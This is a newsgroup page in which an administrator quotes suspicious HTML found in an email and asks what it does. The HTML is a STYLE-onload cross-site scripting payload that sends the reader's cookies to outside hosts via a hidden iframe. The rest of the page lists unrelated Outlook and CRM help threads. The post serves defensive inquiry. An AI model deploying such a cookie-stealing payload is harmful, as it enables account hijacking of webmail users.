Is this an exploit that will do anything in Outlook?

Folks-

One of my users got an e-mail message from a Yahoo user; the message
had the following very interesting HTML code at the end ...

<DIV id=a> </DIV>
<DIV id=b style="VISIBILITY: hidden"></DIV>
<STYLE onload="window.status=''; var x =
escape(document.cookie).substr(0,1900) ; b.innerHTML='<iframe
src=http://yahoo.game-host.org:1646/index.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&amp;cookie=\''+x+'\'
frameborder=0 width=10 height=10></iframe>test'; " type=text/css>
</STYLE>

src=http://y.gotdns.org:1646/index.php?id='+document.title.substring(document.title.indexOf('-')+2)+'&amp;cookie=\''+x+'\'
frameborder=0 width=10 height=10></iframe>test'; " type=text/css>
</STYLE>
</DIV>

.... The only references I can Google up for this sort of thing
indicate that it's a cross-site scripting exploit designed to steal
cookies from Yahoo web-mail users that read their mail with Internet
Explorer, and that it works because the code is in a STYLE, rather
than in a SCRIPT, and therefore gets past various safeguards.

I'm certain the chap who sent the message used Yahoo's webmail, as the
headers indicate it, and he says he usually does.  He's technically
very naive, so I doubt he put the code in his message knowingly.

My user read the message with Outlook 2003, but has very secure
settings for reading HTML mail.  Since I'm not sufficiently
knowledgeable about this sort of malware to know exactly what the
above code is doing, I cannot assure my user that she hasn't
sustained any damage as a result of viewing this message, settings or
no settings.

I would be in the froup's debt if someone could tell me ...

1.  What the above actually does.

2.  Whether the chap who sent the mail (using IE on Yahoo webmail) may
have had any information on his machine compromised.

3.  Whether my user, who read this as HTML on Outlook 2003, may have
had any information compromised.

Thanks.

-Buck
--
Do not reply to this message by e-mail; reply in the newsgroup.
0

Office Outlook #2
when i close Microsoft Office Outlook freeze and stay in task Ichuka-- I'm not sure what you mean by freeze--do you mean it's frozen on the screen and you can't move it and your CPU maxes out, or that you can go on and use your computer efficiently, but when you open up Task Manager, Outlook is still running in the background. Also what version do you have? I have noticed that often when someone has a PDA docked, that Outlook will continue some of the time but not always to run in the background (show up on Task Manager but not visibly on the desktop or minimized to th...

How do I protect a Logo in Outlook 2003.
Hi I need to insert a logo in my signature and don't want anyone to be able to edit or copy it etc. Can anyone help? Regards Grandad If you send anyone a file they can generally do what they like with the contents "Grandad" <info@sherwooditsolutions.co.uk> wrote in message news:%23uBDEjSJJHA.4132@TK2MSFTNGP03.phx.gbl... > Hi > I need to insert a logo in my signature and don't want anyone to be able > to edit or copy it etc. Can anyone help? > Regards > Grandad > Grandad wrote: > Hi > I need to insert a logo in my signature and don...

Outlook is still sending read receipts when they are turned off
Hi All, In outlook 2007, I have an exchange account and an imap account setup. In tools->options->Email Options->Tracking Options I have it set to "Never send a response" for read receipts. But for some reason people are still receiving read receipts from me when ever I read emails in my imap account. How can I stop this happening? Bob <Bob@bobsyouruncle.com> wrote: > I have it set to "Never send a response" for read receipts. > > But for some reason people are still receiving read receipts from me > when ever I read emails in my imap ac...

ms09-007 exploit
my panda security keeps popping up with the MS09-007 vulnerability (no_exploit) it says to go to windows update and run which i did. it does not have any updates for me to download. this all started after i had an issue with my brother printer and i had to create and send some file to Brother, does anyone know which update i need to download to fix this? Thank you "Phil" <Phil@discussions.microsoft.com> wrote in message news:B5F83561-ABEC-4113-92F3-0A47CA85B526@microsoft.com... > my panda security keeps popping up with the MS09-007 vulnerability > (no_e...

Outlook 2003-junk email (will you please help this time)
I have windows xp pro, office2003 and am using outlook 2003. under Actions | junk email | options I have selected safe lists only. Under safe senders I have included email from my contacts. Although I have several people who send me email in both the safe senders list and the my contacts (which should be considered as safe) ALL email I receive is going into the junk email folder. How do I fix this so that email from people in my contacts goes to the inbox and everything else goes to the junk email folder for review?? Thanks Mark ...

How to change which server the Outlook Client is connected to?
We are currently setting up multiple CRM databases in order to have a development environment and a live sales environment. How do I swap the Outlook client over between servers? Thanks Brad Not sure if this is what you are looking for, but try going to regedit: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MSCRM The servers that the outlook client attaches to are here. Note there are two url's you'll need to change: ServerURL and WebAppUrl. Toby bradsprigg@yahoo.com.au (Brad Sprigg) wrote in message news:<dc320d68.0402101741.2fada764@posting.google.com>... > We are currently s...

InstallShield will do ?
Hi... I want to give a installer kind of thing like InstallShield for MS outlook add-ins. Basically I have few dll's and few forms(.oft files) as part of my add-ins Let me know if there are any issues using InstallShield 10.5 version. TIA Bhushan ...

Synchronisation of outlook with CRM
Hi , After logging to CRM client with the specified user-ids, there was a problem when the option "Synchronise Outllok Client with CRM" was clicked. I got the error message as The looged user doesn't have administrative privileges. Contact system administrator even though all the users are given admin privileges. Thanx, Kiran. ...

outlook 2003 #339
Help !!!! this must have been asked many times.but now I need it I cant find it . useing WXP pro and office 2003 with ms outlook for email What are the file referances for outlook mail in items I need to move some of them to a records file. I M Wellworm. Are you trying to extract and move some of the emails ? You cannot . You = can of course back up and save to an outside media but only the whole = file. It is named as *.pstThere is other ways to do this if I am = understanding you correctly. If this is what you want or aiming for post = back. If I am off by not understanding your qu...

Purchase Outlook 2007 ONLY!!!
I would like to purchase Outlook 2007 only, anyone know of a good site? www.amazon.com "CYP" <CYP@discussions.microsoft.com> wrote in message news:1BF8BFE2-B47E-438A-9347-1FA3F816A9C0@microsoft.com... :I would like to purchase Outlook 2007 only, anyone know of a good site? Amazon often has the best pricing, but note that upgrading only outlook while keeping older versions of word means you'll lose some features. The standard version of office (upgrade) is usually about $50 more than buying only outlook. -- Diane Poremsky [MVP - Outlook] Outlook ...

WorkSheet 250 Will not remove Substitute Items at store level
When we remove a substitute item in HQ and send a 250 Worksheet to the stores it will not remove an item unless you add another item at the same time. I have resorted to changing the substitute to a miscellaneous non inventory item Is this a bug in RMS or is something wrong with my installation? -- DDowningMO HQ 2.0.0110 / RMS 2.0.0110 4 Lanes, 4 Back Office Server 2003 SP2 ------=_NextPart_0001_714D3FFE Content-Type: text/plain Content-Transfer-Encoding: 7bit Good morning, Thank you for posting your question about a Worksheet 250. If you remove a Substitute item at HQ the substit...

crm outlook client doesn't work :(
Hi, I just installed Microsoft CRM (version 3.0) and then CRM Outlook Client. But when outlook is not able to load CRM client. I get following error messages subsequently: There is a problem communicating with the Microsoft CRM server. The server might be unavailable. Try again later. If the problem persists, contact your system administrator. An error occurred loading Microsoft CRM functionality. Try restarting Microsoft Outlook. Contact your system administrator if errors persist. HKEY_CURRENT_USER\Software\Microsoft\MSCRMClient\ServerUrl is set to http://*.*.*.*/MSCRMServices and ...

Strange item on remote site will not import
I have imported a website and made changes but something on the remote site will not import, FP says it doesn't recognize the file type. The file is: mainwebsite_html and all the web pages are inside a folder named: mainwebsite_html.bk What does that mainwebsite_html do? The website is: www.stablehousestudio.ca I am afraid to overwrite the files in case nothing works because I don't know what this is about but I am guessing that this somehow references the webpages in the folder mainwebsite_html.bk Please help I don't know what to do. looks like a folder with ...

Outlook Margin
Hi , I would like to insert picture as a margin in a new mail .how and wat are the options in Outlook 2003 ...

REMOVE Attachements in Outlook archive
Hi all, I am looking for a way to remove all attachments from the message in the Archive folder. Is there any way to do so? Please advice! Thanks! Kolia Look at the following page for some 3rd party add-ins that will strip attachments from messages: http://www.slipstick.com/addins/mail.htm -- Jocelyn Fiorello MVP - Outlook *** Messages sent to my e-mail address will NOT be answered -- please reply only to the newsgroup to preserve the message thread. *** In news:557001c3acc8$b865c5a0$a601280a@phx.gbl, Kolia wrote: > Hi all, > > I am looking for a way to remove all attachm...

Exploit.IFrame.FileDownload
How to eliminate Exploit.IFrame.FileDownload from Outlook.pct file? Thanks in advance "Nele" <vucinicn@eunet.yu> wrote in message news:006701c35ea6$aa141210$a501280a@phx.gbl > How to eliminate Exploit.IFrame.FileDownload from > Outlook.pct file? > Thanks in advance Don't know what is a .pct file. Maybe you meant a .pst file. To fix the bug, get a fixed copy of IE. This was fixed 2 years ago. According to F-Secure.com at http://tinyurl.com/jilb who references Microsoft's security article http://tinyurl.com/1b75, this was a problem back in IE 5.0 & 5.5...

Auto configure client stationery Outlook 2003
Is it possible to configure the stationery used on cli´┐Żnt computer through Exchange Server (NB: Small Business Severs 2003's Exchang Server)? I've searched, almost, everywhere, but I can't find a singl article about this. Is it just so obvious or is it just impossible Eather way, I can't imagine an administrator of a large company goin by all the dekstops, configuring the stationery manually. A little ti would be very much appreciated. Using: Server: MS SBS 2003 (incl. ExchangeServer 2003) Clients: WinXP Prof. & Outlook 2003 Joran Spauwen, joranspauwen@hotmail.com, The...

Outlook; a heavy resource comsumer?
Greetings, I am using Outlook 2002 as a part of Office XP on a W98se OS, P4 2gig processor, 640 Mb Sdram, 40 gig HDD. I have made fast find, and Ctfmon "unavailable" as well as disabling MO Search. Never the less, resources drop to a ridiculously low 50% system, 50% user, 68% GDI when the PC has been running for but a short time. Background programs/startup programs are but few (AVG AV, printray stuff, vol control, firewall in Systray) and resources are released readily with OE6 and almost any other program, or when "refreshed". But Outlook 2002, that's another story a...

finding outlook.pst
It looks like I need to run the inbox repair tool, but I can't find the outlook.pst file to start the repair. Anyone? c:\program files\common files\system\msmapi\1033\scanost.exe -- ~jason k ________________________________________________________________ please reply in group. emails directly to me will be printed and laughed at in the breakroom remember to check http://www.technet.com and http://www.google.com ________________________________________________________________ "nancy" <anonymous@discussions.microsoft.com> wrote in message news:E6AC82B0-9636-45DC-AE28-4...

Missing folders and Outlook rules are empty
Hello, I have a power user that has missing folders and empty rules today? Attached URL shows the problem. http://screencast.com/t/FRALDGaTTA I have looked through all my exchange logs and I'm not seeing anything server side. Any help greatly appreciated Best regards, DaveW Cool post with the clear screencast! :-) Sadly, it's still hard to say what happened or what is going on. If you turn off Cached Exchange Mode or look at those folders via OWA, does the content show then? I think the ost-file somehow got corrupted and is causing these quirks. -- Robert Sparnaaij [MVP-Outl...

UserForm will not appear
Here is my code: Private Sub CommandButton1_Click() UserForm1.Show End Sub That's it. But every time I click on CommandButton1, I get this error: "Application-define or object-defined error". The user form worked up until today and I can't think of anything I've done to affect it. Can anyone help me fix this? I can't seem to recreate the error. Do you have any code in the Userform1 Intialize Event? If so, post the code in that event so we can try to fix the bug. -- Cheers, Ryan "Luke" wrote: > Here is my code: &g...

Outlook with Outlook Express ?

Missing Buddy List from Outlook 2010 Beta
Hi All, I have just built a clean Windows 7 laptop and installed Office 2010 beta. I notice that my "buddy list" is missing from the task pane. I also have installed Communicator R2. Anyone know how I can switch this on or fix it? ...